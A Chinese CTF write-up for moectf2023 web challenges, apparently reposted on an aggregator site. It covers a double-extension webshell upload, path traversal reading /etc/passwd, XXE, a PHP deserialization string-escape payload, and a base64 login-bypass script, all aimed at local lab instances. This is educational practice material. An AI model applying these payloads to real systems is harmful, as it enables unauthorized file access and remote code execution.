moectf2023 web wp

news/2025/1/8 10:10:40/文章来源:https://www.cnblogs.com/DSchenzi/p/18659109

gas!gas!gas!

直接跑脚本

import requestssession=requests.Session()
url="http://127.0.0.1:14447"
steering_control=0
throttle=1
for i in range(10):datas={"driver":1,"steering_control":steering_control,"throttle":throttle}print(datas)data=session.post(url,data=datas)try:re=data.text.split('<font color="red">')[1].split("</font>")[0]except:print(data.text)if re.find("右")>-1:steering_control=-1if re.find("直行")>-1:steering_control=0if re.find("左")>-1:steering_control=1if re.find("小")>-1:throttle=0if re.find("保持")>-1:throttle=1if re.find("大")>-1:throttle=2print(re)

moe图床

先随机上传一个带有一句话木马的png文件image-20250104154216743

查看前端代码image-20250104154243520

发现有个upload.php

image-20250104154328716

它只取第一个后缀,那我们可以试着构造1.png.phpimage-20250104154520334

然后蚁剑连接

image-20250104154546302

meo图床

先上传一张图片,发现image-20250104160540989

调用了name参数,来存放文件。尝试是不是文件穿越

image-20250104160641540

发现能读取/etc/passwd

尝试读取/flag

image-20250104160720736

发现了突破口

image-20250104160800572

image-20250104161030273

大海捞针

/?id=1进行id爆破

image-20250104180835884

了解你的座驾

先抓包

image-20250105105352404

URL解码得到xml_content=XDU moeCTF Flag

可以判断为XXE漏洞

image-20250105105448898

再进行URL编码image-20250105105524886

moectf{DO-Y0u-lIk3-the_xXE_VUlHuB-phP-tO_Get_Flag_@fTEr_G@Sgasgas0}

夺命十三枪

发现require_once('Hanxin.exe.php'); 直接/Hanxin.exe.php

根据代码审计,我们需要把$Spear_Owner = 'Nobody';改成MaoLei

同时我们已经知道了目前的payload是O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:15:"夺命十三枪";s:11:"Spear_Owner";s:6:"Nobody";}

image-20250105211304515

发现str_replace 猜测为字符串逃逸 逃逸部分为";s:11:"Spear_Owner";s:6:"MaoLei";}

image-20250105211349182

所以payload=

?chant=di_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}

moectf{PhP_UnsErI@1_coDE-I5_w3LC0me-@Nd_yOU-shoU1D_eScAPe_from_the_filter0}

signin

assert users["admin"] == "admin"
users中存在用户名“admin”密码也为“admin”,表面上看需要传入的参数也为admin/admin。

image-20250105223913189

继续分析源码可以发现eval()语句将base64.b64encode覆写为base64.b64decode

def gethash(*items):c = 0for item in items:if item is None:continuec ^= int.from_bytes(hashlib.md5(f"{salt}[{item}]{salt}".encode()).digest(), "big") # it looks so complex! but is it safe enough?return hex(c)[2:]
#当传入的参数items为2个时该函数等价于求两个参数的异或值并返回,所以当两个参数相等时不管该参数为何值,返回值都为0
#而传入参数有两个过滤,username不能等于“admin”,且username不能等于password,而拿到flag需要hashed值为0,怎么才能做到呢?

而传入参数有两个过滤,username不能等于“admin”,且username不能等于password,而拿到flag需要hashed值为0,怎么才能做到呢?

接下来编写脚本即可把构造的json数据base64编码五次

import requests
import base64url = "http://localhost:64817/login"
username = "\"1\""
password = "1"
jsondata = "{\"username\":"+f"{username}"+",\"password\":"+f"{password}"+"}"
print(f"{jsondata = }")
for _ in range(5):jsondata = base64.b64encode(str(jsondata).encode()).decode()
data = "{\"params\":\""+f"{jsondata}\""+"}"
print(f"{data = }")
req = requests.post(url=url,data=data).text
print(f"{req = }")

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/865769.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【译】GitHub Copilot Free 在 Visual Studio 中

可能您还没有听说过,GitHub 刚刚宣布了 Copilot Free(免费版)!好消息是:您现在已经可以在 Visual Studio 中开始使用 Copilot Free 了。它现在已经可用了,我们将在1月份对更精简的体验进行最后的润色。可能您还没有听说过,GitHub 刚刚宣布了 Copilot Free(免费版)!好…

文档管理工具:物流行业的‘隐形护城河’

在物流行业,效率和成本控制是企业的生命线。无论是运输管理系统、仓储自动化,还是物流管理软件,每一个环节都在为这两大目标服务。然而,在这场“效率与成本”的战争中,有一个关键角色常常被忽略——文档管理工具。 你可能觉得文档管理工具只是一个辅助工具,但事实上,它是…

ABAP 如何得到完整的错误消息(转)

场景描述:BDC或者BAPI返回的系统消息需要组成完整的文本,显示出来供查错误原因.方法一,用message into,语法如下:MESSAGE ID sy-msgid TYPE sy-msgty NUMBER sy-msgnoINTO DATA(mtext)WITH sy-msgv1 sy-msgv2 sy-msgv3 sy-msgv4方法二,调用函数 MESSAGE_TEXT_BUILD() 作用…

CDS标准视图:技术对象检验级别描述 I_TechObjInspectionLevelText

视图名称:技术对象检验级别描述 I_TechObjInspectionLevelText 视图类型:基础视图 视图代码:点击查看代码 @AbapCatalog: {sqlViewName: ITECHOBJINSPLVLT,compiler.compareFilter: true,preserveKey: true }@AccessControl.authorizationCheck: #NOT_REQUIRED@EndUserText.…

面向强化学习的状态空间建模:RSSM的介绍和PyTorch实现

循环状态空间模型(Recurrent State Space Models, RSSM)最初由 Danijar Hafer 等人在论文《Learning Latent Dynamics for Planning from Pixels》中提出。该模型在现代基于模型的强化学习(Model-Based Reinforcement Learning, MBRL)中发挥着关键作用,其主要目标是构建可…

从接单到反馈:看板软件打造家政服务闭环管理

家政行业通过应用看板软件可以更加高效、有序地管理日常工作,优化工作流程,提高团队协作效率和服务质量。根据《2024年中国家政服务行业发展状况及消费洞察报告》,2023年中国家政服务市场规模达11641亿元,仍呈增长趋势;预计到2026年,中国家政服务行业的市场规模将突破130…

国产化板卡设计资料:2270-VC709E 基于FMC接口的JFM7VX690T36 PCIeX8 接口卡

VC709E 基于FMC接口的JFM7VX690T36 PCIeX8 接口卡 一、板卡概述 本板卡基于FPGA JFM7VX690T36 芯片,支持PCIeX8、两组 64bit DDR3容量8GByte,HPC的FMC连接器,板卡支持各种FMC子卡扩展。软件支持windows,Linux操作系统。二、功能和技术指标 : 四、应用领域软件无线电处理平…

SAP SE37函数模块异常抛出

今天写了一个功能,生产订单批量打删除标识,我用一个函数来封装相应的功能,并且使用一下RAISE异常的功能 在函数里面判断用户是否在ALV界面选中了数据,如果没有选中则抛出异常 打断点发现,RAISE异常之后代码会中断执行,退出相应的函数模块。是非常好用的代码。函数部分调用…

网站管理助手无法创建数据库及连接问题的解决方案

问题描述: 用户在使用网站管理助手创建数据库时遇到困难,不仅无法创建新的数据库,而且已创建的数据库也无法正常连接。这种情况严重影响了用户的数据库管理效率和网站的正常运行。 解决方案:确认工具与环境兼容性: 首先,确保使用的网站管理助手版本与当前的操作系统和数据…

如何解决无法登录云服务器的问题

问题描述: 我无法登录我的云服务器,输入正确的账户密码后仍然无法成功登录。请问如何解决这个问题? 回答: 当您无法登录云服务器时,可能是由于多种原因引起的。以下是一些详细的排查和解决方案:检查远程服务状态:重启远程服务:首先,尝试重启服务器的远程服务(如SSH或…

请问如何处理网站频繁被篡改的问题

问题描述: 用户报告其网站频繁被篡改,首页文件不断被修改,甚至文件名也会被更改。尽管采取了多种防护措施,问题仍然频繁发生。用户希望了解如何彻底解决网站被篡改的问题,确保网站安全稳定运行。 解决方案:确认木马病毒和漏洞: 确认网站是否存在木马病毒或程序漏洞。可以…

如何设置二级域名直接跳转至移动端网站,避免通过默认路径访问?

问题描述: 用户希望将二级域名(如 m.example.com)直接指向移动端网站,而不是通过主域名的 /m 文件夹进行访问。当前情况下,手机访问主域名时会自动跳转到 /m 文件夹,但希望通过二级域名直接访问移动端内容。 解决方案: 要实现二级域名直接访问移动端网站而不经过默认路径…